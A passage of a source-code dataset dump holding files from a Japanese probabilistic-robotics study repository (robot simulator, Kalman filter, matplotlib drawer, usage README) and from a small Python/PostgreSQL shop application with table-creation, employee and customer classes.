"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport math\nimport random\n\nclass Sim:\n DT = 10 #ms\n def __init__(self,x,y,dx,dy,theta,omega):\n self.x = x #mm\n self.y = y #mm\n self.dx = dx #mm/s\n self.dy = dy #mm/s\n self.theta = theta #rad\n self.omega = omega # rad/s\n self.ddx = 0 #mm/s^2\n self.ddy = 0 #mm/s^2\n self.ep = 0 #rad/s^2\n self.b_x = 0\n self.b_y = 0\n\n def setpos(self,x,y,dx,dy,theta,omega):\n self.x = x #mm\n self.y = y #mm\n self.dx = dx #mm/s\n self.dy = dy #mm/s\n self.theta = theta #rad\n self.omega = omega # rad/s\n self.b_x = 0\n self.b_y = 0\n\n def poszero(self):\n self.setpos(0,0,0,0,0,0)\n\n def setacc(self,ddx,ddy,ep):\n self.ddx = ddx\n self.ddy = ddy\n self.ep = ep\n\n def setacczero(self):\n self.setacc(0,0,0)\n\n def update(self):\n self.b_x = self.x\n self.b_y = self.y\n self.x += (self.dx * self.DT + 0.5 * self.ddx * self.DT**2)\n self.y += (self.dy * self.DT + 0.5 * self.ddy * self.DT**2)\n self.dx += (self.ddx + (random.random() - 0.5) * 0.1) * self.DT\n self.dy += (self.ddy + (random.random() - 0.5) * 0.1) * self.DT\n self.theta += (self.omega * self.DT + 0.5 * self.ep * self.DT**2)\n self.omega += (self.ep + (random.random() - 0.5) * 0.00001) * self.DT\n\n def get_enc(self):\n return np.array([[np.cos(self.theta), -np.sin(self.theta)],[np.sin(self.theta), np.cos(self.theta)]]) @ np.array([[(self.x - self.b_x) * (1 + 0.3 * (random.random() - 0.6)), (self.y - self.b_y) * (1 + 0.3 * (random.random() - 0.4))]]).T\n\n def get_x_length(self):\n return self.x + 20 * (random.random() - 0.5)\n\n def get_y_length(self):\n return self.y + 20 * (random.random() - 0.5)\n\n def get_theta(self):\n return self.theta + 0.00000000 * (random.random() - 0.5)\n\n def get_gyro(self):\n return self.omega + (random.random() - 0.5) * 0.000001\n\n\n#x=0の柵があると過程したとき\n#angleはマシンの正面からみた角度右が正\n def get_single_wall_length(self, angle):\n field_angle = self.theta + angle\n length = -self.x / np.float64(np.sin(field_angle))\n if length < 0 or length == np.inf:\n return np.inf\n else :\n return length + (random.random() - 0.5) * 5\n\n\n#以下はx=4000, x=-4000, y= 4000, y=-4000に柵があると過程したときのもの\n#angleはマシンの正面からみた角度右が正\n def get_multi_wall_length(self,angle):\n field_angle = self.theta + angle\n ls = []\n #x = 4000\n length = (4000 - self.x) / np.float64(np.sin(field_angle))\n if length < 0 or length == np.inf:\n ls.append(np.inf)\n else :\n ls.append(length)\n #x = -4000\n length = (-4000 - self.x) / np.float64(np.sin(field_angle))\n if length < 0 or length == np.inf:\n ls.append(np.inf)\n else :\n ls.append(length)\n #y = 4000\n length = (4000 - self.y) / np.float64(np.cos(field_angle))\n if length < 0 or length == np.inf:\n ls.append(np.inf)\n else :\n ls.append(length)\n #y = -4000\n length = (-4000 - self.y) / np.float64(np.cos(field_angle))\n if length < 0 or length == np.inf:\n ls.append(np.inf)\n else :\n ls.append(length)\n\n if min(ls) == np.inf:\n return np.inf\n else:\n return min(ls) + (random.random() - 0.5) * 5\n\n # マシンの向きに対して垂直方向に12素子並んでいるラインセンサーを仮定する\n # マシンの中心から左右に素子間の距離を2mmでならんでいる\n # つまりマシン座標系で(1,0),(-1,0),(3,0),(-3,0)...とならんでいる\n # x=0(y軸)とy=0(x軸)に幅200mmの線が引かれていてそれを認識できるとする\n # またノイズとして一定の確率で正負がひっくり返ることがある\n def get_line_sensor(self):\n machine_sensor_point = np.array(\n [\n [11, 9, 7, 5, 3, 1, -1, -3, -5, -7, -9, -11],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n ]\n )\n field_sensor_point = np.array(\n [\n [np.cos(-self.theta), -np.sin(-self.theta)],\n [np.sin(-self.theta), np.cos(-self.theta)],\n ]\n ) @ machine_sensor_point + np.array([[self.x], [self.y]])\n data = np.random.rand(12)\n for i in range(0, len(data)):\n if (\n field_sensor_point[0][i] >= -100 and field_sensor_point[0][i] <= 100\n ) or (field_sensor_point[1][i] >= -100 and field_sensor_point[1][i] <= 100):\n data[i] -= 0.01\n else:\n data[i] -= 0.99\n if data[i] < 0:\n data[i] = 0\n else:\n data[i] = 1\n return data\n"
},
{
"alpha_fraction": 0.6855524182319641,
"alphanum_fraction": 0.7053824067115784,
"avg_line_length": 17.578947067260742,
"blob_id": "24780ee45330d073df78318b667c36ce18d3b2bd",
"content_id": "40663b577412731b4eeba616a3774acb4c3ed3a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 383,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 19,
"path": "/default.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n\nfrom sim import simulator\nfrom drawer import drawer\nimport numpy as np\nfrom config import config\n\ndef plot(data):\n sim.update()\n ball_img = drawer.draw_point(sim.x,sim.y)\n return ball_img\n\nsim = simulator.Sim(0.,0.,1.,1.,0.,0.) #シミュレーターのコンストラクタ\n\ndrawer = drawer.Drawing(plot)\n\nball_img = config.init(drawer)\n\ndrawer.show()\n"
},
{
"alpha_fraction": 0.46804124116897583,
"alphanum_fraction": 0.5484536290168762,
"avg_line_length": 32.44827651977539,
"blob_id": "4000efc3a64fc636c1acd7edd90e75e7393a6e88",
"content_id": "a2029057b5b23cd23c886aed79f869b19036b898",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 970,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 29,
"path": "/kf/hoge.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport math\nimport random\n\n\n\nclass Map:\n DT = 10 #ms\n def __init__(self):\n self.x = np.array([[0,0,0]])\n self.Pxy = np.array([[10,10,0.0001]])\n\n def set_pos(self, pos):\n self.x = np.array(pos)\n self.Pxy = np.array([[10,10,0.0001]])\n\n def update(self, sim):\n self.x += np.array([[0,0,sim.get_gyro() * self.DT]])\n self.x += (np.array([[np.cos(-self.x[0][2]),-np.sin(-self.x[0][2])],[np.sin(-self.x[0][2]), np.cos(-self.x[0][2])],[0,0]]) @ sim.get_enc()).T\n self.Pxy += np.array([[1600,1600,0.0001]])\n\n def update2(self, sim):\n tmp = np.array([[sim.get_x_length(), sim.get_y_length(), sim.get_theta()]]) - self.x\n tmp *= (self.Pxy / (self.Pxy + np.array([[600,600,0.000001]])))\n self.x += tmp\n self.Pxy *= (1 - (self.Pxy/(self.Pxy + np.array([[600.0,600,0.000001]]))))\n"
},
{
"alpha_fraction": 0.582587480545044,
"alphanum_fraction": 0.65500408411026,
"avg_line_length": 29.725000381469727,
"blob_id": "c39121baa0090e2a511ae56561dae7f1ac5fb614",
"content_id": "f74260672ea9a03cb9d9c2df9909b75f4b50177d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1229,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 40,
"path": "/kf_main.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nfrom sim import simulator\nfrom drawer import drawer\nimport math\nimport numpy as np\nfrom config import config\nfrom kf import hoge\n\n\ndef plot(data):\n global cnt\n cnt += 1\n simulator.update()\n kf.update(simulator)\n if cnt % 10 == 0:\n kf.update2(simulator)\n ball_img = drawer.draw_arraw(simulator.x,simulator.y, simulator.x+200*math.sin(simulator.theta), simulator.y+200*math.cos(simulator.theta))\n ball_img = drawer.draw_point(simulator.x, simulator.y)\n ball_img = drawer.draw_point(kf.x[0][0],kf.x[0][1], c='b')\n ball_img = drawer.draw_circle(kf.x[0][0],kf.x[0][1],np.sqrt(kf.Pxy[0][0]),np.sqrt(kf.Pxy[0][1]),c='g')\n ball_img = drawer.draw_arraw(kf.x[0][0],kf.x[0][1], kf.x[0][0]+200*np.sin(kf.x[0][2]), kf.x[0][1]+200*np.cos(kf.x[0][2]),\"black\")\n if abs(simulator.x) > 4000 or abs(simulator.y) > 4000 :\n drawer.stop_animation()\n return ball_img\n\ncnt = 0\n\nsimulator = simulator.Sim(0,0,0,0,0,0) #x,y,dx,dy,theta,dtheta\nsimulator.setacc(0,0,0) #ddx,ddy,ddtheta\nsimulator.setpos(-3000,-3000,5,5,-1.57,0.0000) #x,y,dx,dy,theta,dtheta\n\nkf = hoge.Map()\n\nkf.set_pos([[-3000,-3000,-1.57]])\n\ndrawer = drawer.Drawing(plot)\n\nball_img = config.init(drawer)\n\ndrawer.show()\n"
},
{
"alpha_fraction": 0.5952380895614624,
"alphanum_fraction": 0.6635944843292236,
"avg_line_length": 30.7560977935791,
"blob_id": "2f9ff823a5934b5893c56696f06df0f6862a4af3",
"content_id": "14e42e4603252a7d307e7d027582aac1d1f7a084",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1302,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 41,
"path": "/multi_model_ekf_main.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nfrom sim import simulator\nfrom drawer import drawer\nimport math\nimport numpy as np\nfrom config import config\nfrom multi_model_ekf import hoge\n\n\ndef plot(data):\n global cnt\n cnt += 1\n simulator.update()\n ekf.update(simulator)\n if cnt % 10 == 0:\n ekf.update2(simulator)\n ball_img = drawer.draw_arraw(simulator.x,simulator.y, simulator.x+200*math.sin(simulator.theta), simulator.y+200*math.cos(simulator.theta))\n ball_img = drawer.draw_point(simulator.x, simulator.y)\n ball_img = drawer.draw_point(ekf.x[0][0],ekf.x[0][1], c='b')\n ball_img = drawer.draw_circle(ekf.x[0][0],ekf.x[0][1],np.sqrt(ekf.Pxy[0][0]),np.sqrt(ekf.Pxy[1][1]),c='g')\n ball_img = drawer.draw_arraw(ekf.x[0][0],ekf.x[0][1], ekf.x[0][0]+200*np.sin(ekf.x[0][2]), ekf.x[0][1]+200*np.cos(ekf.x[0][2]),\"black\")\n #print(simulator.get_multi_wall_length(1.57))\n if abs(simulator.x) > 4000 or abs(simulator.y) > 4000 :\n drawer.stop_animation()\n return ball_img\n\ncnt = 0\n\nsimulator = simulator.Sim(0,0,0,0,0,0) #x,y,theta,dx,dy,dtheta\nsimulator.setacc(0,0,0) #ddx,ddy,ddtheta\nsimulator.setpos(-3000,-3000,5,5,0,0.0001) #x,y,theta,dx,dy,dtheta\n\nekf = hoge.Map()\n\nekf.set_pos([[-3000,-3000,0.0]])\n\ndrawer = drawer.Drawing(plot)\n\nball_img = config.init(drawer)\n\ndrawer.show()\n"
},
{
"alpha_fraction": 0.7343036532402039,
"alphanum_fraction": 0.7585616707801819,
"avg_line_length": 23.33333396911621,
"blob_id": "00eac02e118a4f46ae8616e69b7292acf1d4c463",
"content_id": "f9bab1953b287d3d9813401b0e867581c4b4205f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7132,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 144,
"path": "/README.md",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "# 確率ロボティクスの勉強\n## KF\n```\n$./kf_main.py\n```\n## Single Model EKF\n```\n$./single_ekf_main.py\n```\n## Multi Model EKF\n```\n$./multi_model_ekf_main.py\n```\n\n## 使い方\n* default.pyをコピーして同じ場所にmain.pyなどを作ってそれを変更する感じでやればいいと思います\n* 読めばわかるがplot関数内でball\\_imgに色々渡して上げればそれがプロットされます\n* 基本的にplot関数が毎周期呼ばれるので一定周期で呼ばれたいものはこの中に書きましょう\n* 柵などの最初から書かれてほしくて変化しないものはconfig/config.pyに書いてあげましょう\n* デフォルトでは-4000~4000の正方形で囲むように書かれています\n* また左下にstopボタンとresetボタンがあります\n * ストップボタンはトグルスイッチで押したらstartとstopを切り替えます\n * plot関数のループを止めます\n * resetボタンは何も実装していないので押してもなにも起こりません\n### drawer\n* drawerに用意されている関数一覧\n* まあ自分でコード読めって話だけど\n* 基本的にこれらの関数の返り値をball\\_imgに渡してあげれば良いです\n* [色一覧参考ページ](https://pythondatascience.plavox.info/matplotlib/色の名前)\n#### draw\\_point(x, y, c=\"r\", pointsize=3)\n* 引数のxとyの場所に点をプロットします\n* 第三引数と第四引数は指定しなくても大丈夫です\n* デフォルトでは赤色の大きさ3の点をプロットします\n#### draw\\_circle(x, y, x\\_diameter, y\\_diameter, c=\"b\")\n* 引数のxとyの場所に横の直径x\\_diameterの縦の直径y\\_diameterの円(楕円)をプロットします\n* デフォルトの色は青色です\n* 正確には円周をプロットします\n* 中を塗りつぶしたものは実装していません(大きい点のプロットで頑張って)\n#### draw\\_arraw(start\\_x, start\\_y, end\\_x, end\\_y, c=\"gray\")\n* 名前の通りstartの点からendの点への矢印をプロットします\n* デフォルトの色はグレーです\n* 矢印のタイプやサイズなどをいじりたかったら関数の中身を自分で書き換えてください\n#### draw\\_line(p1, p2, c=\"g\")\n* 他と統一すればよかったのですがまあ許して下さい\n* x,yの配列を渡して下さい\n* 渡された2つのポイントをつなぐ直線を引きます\n* 中身をいじれば線の太さとかも変えられます\n* デフォルトの色は緑色です\n* こんな感じで使って下さい\n```\ndraw_line([0,0], [100, 100], c=\"r\")\n```\n#### start\\_stop\\_animation\n* この関数を呼べばアニメーションが動いてたら止まり、止まってたら動きます\n* トグルスイッチです\n* アニメーションが止まるというより、plot関数のループが止まります\n#### stop\\_animation\n* この関数を呼ぶとアニメーションが止まります\n#### reset\\_animation\n* 未実装\n\n### simulator\n* simulatorに用意されている関数一覧\n* 同様に自分でコード読めって話だけど\n* 大して頭いいことしてないです\n* 自己位置推定がメインなので適当に動いてくれればいいというお気持ちです(分散結構大きいから変なふうに動くと思う)\n* x,y,thetaとそれの一回微分、二回微分を状態量として持っていて、それを毎周期更新するだけののもです\n* x,y,theta,dx,dy,omegaでアクセスできる\n\n#### \\_\\_init\\_\\_(x,y,dx,dy,theta,omega)\n* コンストラクタ\n* 初期のx,y,theta,dx,dy,omegaを引数とする\n* 一応float型で渡してあげた(0.とかにする)ほうがよい??(pythonよくわかんない)\n* 二回微分は0で初期化する\n\n#### setpos(x,y,dx,dy,theta,omega)\n* コンストラクタと同じことしかしてない\n* 同様に一応float型で渡してあげた(0.とかにする)ほうがよい??(pythonよくわかんない)\n* 二回微分は0で初期化する\n\n#### poszero()\n* setpos(0,0,0,0,0,0)を呼んでいるだけ\n\n#### setacc(ddx,ddy,ep)\n* 各成分の二回微分を指定できる\n* 電流制御のお気持ち\n* 別に速度司令で適当に動かしてもいい\n* っていうか速度司令のが直感的だし良い気がする\n\n#### update()\n* この関数を呼ぶと各状態量からdt=10msで一回更新される\n* またこのとき二回微分による一回微分の更新には適度な分散を乗せている\n* 今は一様分布だが分散の乗せ方を変えたければ中身をみて\n* 例えばこの関数をplot関数内で呼んであげればよい\n\n#### get\\_enc()\n* マシンにとってのxとyの前回周期からの変化の差分を返してくれる\n* 一様な適度な分散を乗せている\n* マシンにとってなので、フィールドにとってではないので注意\n* 返り値:np.array([[dx],[dy]])\n\n#### get\\_x\\_length()\n* マシンの自己位置のxについてある程度の一様分散を乗せてかえす\n* 返り値:float\n* 実際の世界では不可能なものだが線形なモデルのテストをしたいときに使う\n\n#### get\\_y\\_length()\n* xと同様\n\n#### get\\_theta()\n* xと同様\n* 図で言うと上方向(y軸正の方向)を0として時計回りに正としたradを返す\n\n#### get\\_gyro()\n* 状態量omegaに適当な一様分散を持たせて返してきます\n\n#### get\\_single\\_wall\\_length(angle)\n* マシン座標系でのy軸正の方向を0とした時計回りに正とした方向に測距センサーを飛ばして帰ってきた値を返す\n* x=0(y軸)の柵だけが存在するという仮定で計算されます\n* もし計算した方向に柵が存在しなかったり、極めて遠くであればnp.infを返す\n\n#### get\\_multi\\_wall\\_length(angle)\n* get\\_single\\_wall\\_length(angle)と同様\n* x=4000, x=-4000, y= 4000, y=-4000に柵があると仮定し一定の一様分散を乗せて距離を返す\n* どの柵を読んで値を返しているかはわからない\n* どの柵も読めない場合などはnp.infを返す\n\n#### get\\_line\\_sensor()\n* マシンの向きに対して垂直方向に12素子並んでいるラインセンサーを仮定する\n* その素子がラインを読んでいれば1を読んでいなければ0を返す\n* マシンの中心から左右に素子間の距離を2mmでならんでいる\n* つまりマシン座標系で(1,0),(-1,0),(3,0),(-3,0)...とならんでいる\n* x=0(y軸)とy=0(x軸)に幅200mmの線が引かれていてそれを認識できるとする\n* またノイズとして一定の確率で1,0がひっくり返ることがある\n* 返り値:np.array([(1 or 0),...])\n* 返り値の配列はインデックス0(左から順)に(11,0),(9,0),...(-9,0),(-11,0)の素子のデータが入っている\n\n## [Lecture作り中](/lec/README.md)\n\n## 一言\n* 使い方書くの面倒くさくなった\n* そもそも使い方知りたい人いるのかなあ\n* そのうちUKFとEIFとパーティクルフィルターも実装したいね\n* ってかだれか実装してほしい\n"
},
{
"alpha_fraction": 0.5520153641700745,
"alphanum_fraction": 0.5754318833351135,
"avg_line_length": 40.349205017089844,
"blob_id": "ee0044f95d64cf7502dee57ec050d9b211cc5cb8",
"content_id": "d1504b1509b631ccd58c3f3208d8041091e8c7be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2809,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 63,
"path": "/drawer/drawer.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.patches as pat\nfrom matplotlib.widgets import Button, Slider\nimport math\n\nclass Drawing():\n def __init__(self, func):\n self.color = []\n self.fig = plt.figure()\n self.ax = self.fig.add_subplot(111)\n self.ax.set_xlim(-5000,5000)\n self.ax.set_ylim(-5000,5000)\n self.ax.set_aspect('equal')\n self.ax.set_xlabel('X [m]') \n self.ax.set_ylabel('Y [m]') \n self.ax.grid(True)\n self.stopButton = self.__createButton(0, 0, 0.15, 0.1, \"stop\", self.start_stop_animation) # (左下 x 座標, 左下 y 座標, 幅, 高さ, ラベル, バインドする函数)\n self.resetButton = self.__createButton(0, 0.1, 0.15, 0.1, \"reset\", self.reset_animation) # (左下 x 座標, 左下 y 座標, 幅, 高さ, ラベル, バインドする函数)\n self.ani = animation.FuncAnimation(self.fig, func, interval=100, frames=10)\n self.is_start = True\n\n def draw_point(self, center_x, center_y, c = \"r\", pointsize=3):#人の大きさは半径15cm\n return self.ax.plot(center_x, center_y, \".\", color=c,markersize=pointsize)\n\n\n def draw_circle(self, center_x, center_y, size_x, size_y, c = \"b\"):\n e1 = pat.Ellipse(xy = (center_x, center_y), width = size_x, height = size_y, angle = 0,fc = None, fill = False,ec = c)\n return self.ax.add_patch(e1)\n\n def draw_arraw(self,start_x,start_y,end_x,end_y,c=\"gray\"):\n return self.ax.annotate('', xy=(end_x,end_y), xytext=(start_x,start_y),\n arrowprops=dict(shrink=0, width=0.5, headwidth=2, \n headlength=2, connectionstyle='arc3',\n facecolor='gray', edgecolor=c)\n )\n\n def draw_line(self,p1,p2,c=\"g\"):\n return self.ax.plot([p1[0],p2[0]], [p1[1],p2[1]], color = c)\n\n def start_stop_animation(self,event):\n if self.is_start:\n self.ani.event_source.stop()\n self.is_start = False\n else :\n self.ani.event_source.start()\n self.is_start = True\n\n def stop_animation(self,event):\n self.ani.event_source.stop()\n\n def reset_animation(self, event):\n pass\n\n def __createButton(self, bottomLeftX, bottomLeftY, width, height, label, func):\n box = self.fig.add_axes([bottomLeftX, bottomLeftY, width, height]) # ボタン用の枠を描いて、\n button = Button(box, label) # それをボタンとして実体化して、\n button.on_clicked(func) # クリックされたときに実行する函数をバインドする。\n return button\n\n def show(self):\n plt.show()\n"
},
{
"alpha_fraction": 0.5258620977401733,
"alphanum_fraction": 0.6034482717514038,
"avg_line_length": 13.5,
"blob_id": "9d8b8fb1d7575a9384a3b06d02989501aed92215",
"content_id": "eacdde089f2eac0a348a1d0e89be732b188eb681",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 8,
"path": "/test.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "import math\nimport numpy as np\n\nx = np.array([[10,10,10]])\ny = np.array([[1,0,0]])\nprint(x)\nprint(y)\nprint(x.T @ y)\n"
}
] | 12 |
yura-seredyuk/shop_app
|
https://github.com/yura-seredyuk/shop_app
|
b58c84609bac6b31749413ad0d62f28b54c7ee1e
|
5ddab6cf3052932761081aaceafe12d7237311ce
|
e80f88531532824da25f4b32a4f04407bb4f5e6a
|
refs/heads/master
| 2023-09-04T11:58:13.704692 | 2021-11-03T16:01:27 | 2021-11-03T16:01:27 | 386,386,579 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5635507702827454,
"alphanum_fraction": 0.5716207027435303,
"avg_line_length": 23.344263076782227,
"blob_id": "3071280911a114e07e1cf4f37c5cfe31e8685b78",
"content_id": "d0339d49797d5ad287abd59dc4bef9206d435606",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1487,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 61,
"path": "/employee.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import psycopg2\nfrom settings import *\nfrom connection import Connection\n\n\nclass Employee(Connection):\n\n def __init__(self, login, password):\n self.login = login\n self.password = password\n\n\n def register_self(self):\n pass\n\n def get_order_info(self, selector = ''):\n table = ('orders',)\n fields = ('*',)\n selector = ''\n result = self.getData(table, fields, selector)\n return result\n\n def add_pr_category(self, data):\n table = 'product_category'\n result = self._postData(table, data)\n return result\n\n def edit_pr_category(self, data, selector):\n table = 'product_category'\n result = self.updateData(table, data, selector)\n return result\n\n def delete_pr_category(self, selector):\n table = 'product_category'\n selector = f\"category_name = '{selector}'\"\n result = self.deleteData(table,selector)\n return result\n\n\n\nif __name__ == '__main__':\n\n admin1 = Employee('Admin1', '1234')\n # orders = admin1.get_order_info()\n # print(orders)\n data = [{\n 'category_name': \"Beer\"\n },\n ]\n put = admin1.add_pr_category(data)\n print(put)\n # data = {\n # 'category_name': \"Water\"\n # }\n # edit = admin1.edit_pr_category(data, \"category_name = 'Rom'\")\n # print(edit)\n # id = admin1.getNextId('product_category')\n # print(id)\n\n # dele = admin1.delete_pr_category('Beer')\n # print(dele)\n\n\n"
},
{
"alpha_fraction": 0.7183462381362915,
"alphanum_fraction": 0.7260981798171997,
"avg_line_length": 31.33333396911621,
"blob_id": "40387da96ff94c285ee79268d3027c9de04fe475",
"content_id": "4aa7ff7038f9f54f673a3100cf005ce4d80f2e2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 387,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 12,
"path": "/create.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import psycopg2\nfrom psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT\nfrom settings import *\n\nconnection = psycopg2.connect(user = USER, password = PASSWORD,\n host = HOST, port = PORT)\nconnection.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n\ncursor = connection.cursor()\ncursor.execute(\"CREATE DATABASE shop_db\")\ncursor.close()\nconnection.close()"
},
{
"alpha_fraction": 0.4998602271080017,
"alphanum_fraction": 0.5076879858970642,
"avg_line_length": 38.28571319580078,
"blob_id": "d5f444e491cabdeef8799b65bc8b48cd6e75dd28",
"content_id": "0c7c11f7d80ce3e0cfb156f2353b6341881b4b22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3577,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 91,
"path": "/customer.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import psycopg2\nfrom settings import *\nfrom connection import Connection\nfrom datetime import datetime\n\nclass Customer(Connection):\n\n def __init__(self, login, password):\n self.login = login\n self.password = password\n self.first_name = ''\n self.last_name = ''\n self.city_id = ''\n self.id = ''\n\n def register_self(self,first_name, last_name, city ):\n self.register( self.login, self.password, 'cus')\n data=[{\n 'city_id': city,\n 'first_name': first_name,\n 'last_name': last_name,\n 'reg_id': self.getNextId('reg_base')-1\n }]\n self._postData('customer', data)\n \n def login_self(self):\n id = self.login_check(self.login,self.password, 'cus')\n if id:\n self.first_name = self.getData(('customer',),('first_name',),f\"where reg_id = {id}\")[0][0]\n self.last_name = self.getData(('customer',),('last_name',),f\"where reg_id = {id}\")[0][0]\n self.city_id = self.getData(('customer',),('city_id',),f\"where reg_id = {id}\")[0][0]\n self.id = self.getData(('customer',),('id',),f\"where reg_id = {id}\")[0][0]\n # print(self.first_name, self.last_name, self.city_id)\n return True\n return False\n\n def get_order_info(self, category = '', selector = '', ):\n \"\"\"\n category must be one of the item from the list:\n ['city_name','date_of_order', 'product_name']\n\n date format for selector: 2020-6-12\n \"\"\"\n if self.login_self():\n categoryes = ['city_name','date_of_order', 'product_name']\n table = ('orders o',)\n fields = (\"\"\"o.id, concat(e.first_name,' ', e.last_name) as \"employee\", c.city_name, o.date_of_order, concat(c2.first_name,' ', c2.last_name) as \"customer\", p.product_name, o.price \"\"\",)\n if category and category in categoryes and selector:\n where = f\"\"\"where {category} = '{selector}'\"\"\"\n else:\n where = ''\n selector = f\"\"\" inner JOIN employee e on e.id = o.employee_id \n inner JOIN city c on c.id = o.city_id \n inner JOIN customer c2 on c2.id = o.customer_id \n inner JOIN product p on p.id = o.product_id {where}\"\"\"\n result = self.getData(table, fields, selector)\n fieldNames = [\"id\", \"employee\", \"city_name\",\"date_of_order\", \"customer\", \"product_name\", \"price\" ]\n changeRes = []\n for item in result:\n cort = {}\n for index,element in enumerate(item):\n cort[fieldNames[index]]=element\n changeRes.append(cort)\n else:\n changeRes = \"Invalid loging!\"\n return changeRes\n\n\n\n def create_order(self, products):\n if self.login_self():\n table = 'orders'\n data = []\n for item in products:\n order = {\n \"customer_id\": self.id,\n \"city_id\": self.city_id,\n \"date_of_order\": datetime.today().strftime('%Y-%m-%d'),\n \"product_id\": self.getData(('product',),('id',),f\"where product_name = '{item[0]}'\")[0][0],\n \"price\": self.getData(('product',),('unit_price',),f\"where product_name = '{item[0]}'\")[0][0] * item[1]\n }\n data.append(order)\n result = self._postData(table, data)\n return result\n\n\n\n\n\nif __name__ == '__main__':\n pass\n\n\n"
},
{
"alpha_fraction": 0.6745283007621765,
"alphanum_fraction": 0.6839622855186462,
"avg_line_length": 26.66666603088379,
"blob_id": "b7e67d56372430578b13c2d5aa5046cd7d7cd0c4",
"content_id": "953fbaaecca62e7b638742de92c89b26f1ca6d0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1908,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 69,
"path": "/add_tables.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import psycopg2\nfrom settings import *\n\nconnection = psycopg2.connect(user = USER, password = PASSWORD,\n host = HOST, port = PORT, \n database = 'shop_db')\n\ncursor = connection.cursor()\ncountry = \"\"\"CREATE TABLE country(\n id SERIAL PRIMARY KEY,\n country_name varchar(50) NOT NULL\n)\"\"\"\ncursor.execute(country)\nconnection.commit()\n\ncity = \"\"\"CREATE TABLE city(\n id SERIAL PRIMARY KEY,\n city_name varchar(50) NOT NULL,\n counrty_id INT REFERENCES country(id)\n)\"\"\"\ncursor.execute(city)\nconnection.commit()\nemployee = \"\"\"CREATE TABLE employee(\n id SERIAL PRIMARY KEY,\n first_name varchar(50) NOT NULL,\n last_name varchar(50) NOT NULL,\n date_of_bitrth DATE NOT NULL,\n city_id INT REFERENCES city(id),\n chief_id INT REFERENCES employee(id)\n)\"\"\"\ncursor.execute(employee)\nconnection.commit()\ncategory = \"\"\"CREATE TABLE product_category(\n id SERIAL PRIMARY KEY,\n category_name varchar(50) NOT NULL\n)\"\"\"\ncursor.execute(category)\nconnection.commit()\nproduct = \"\"\"CREATE TABLE product(\n id SERIAL PRIMARY KEY,\n product_name varchar(50) NOT NULL,\n unit_price real NOT NULL,\n counrty_id INT REFERENCES country(id),\n category_name INT REFERENCES product_category(id)\n)\"\"\"\ncursor.execute(product)\nconnection.commit()\ncustomer = \"\"\"CREATE TABLE customer(\n id SERIAL PRIMARY KEY,\n city_id INT REFERENCES city(id),\n first_name varchar(50) NOT NULL,\n last_name varchar(50) NOT NULL\n)\"\"\"\ncursor.execute(customer)\nconnection.commit()\norder = \"\"\"CREATE TABLE orders(\n id SERIAL PRIMARY KEY,\n employee_id INT REFERENCES employee(id),\n city_id INT REFERENCES city(id),\n date_of_order DATE NOT NULL,\n customer_id INT REFERENCES customer(id),\n product_id INT REFERENCES product(id),\n price REAL NOT NULL\n)\"\"\"\ncursor.execute(order)\nconnection.commit()\n\ncursor.close()\nconnection.close()"
},
{
"alpha_fraction": 0.5333333611488342,
"alphanum_fraction": 0.644444465637207,
"avg_line_length": 21.5,
"blob_id": "9205ea899e3f88dd3a1c13e6c32c762c19a609d6",
"content_id": "841d1fac1d0b040eb2340d12d40219560166805e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
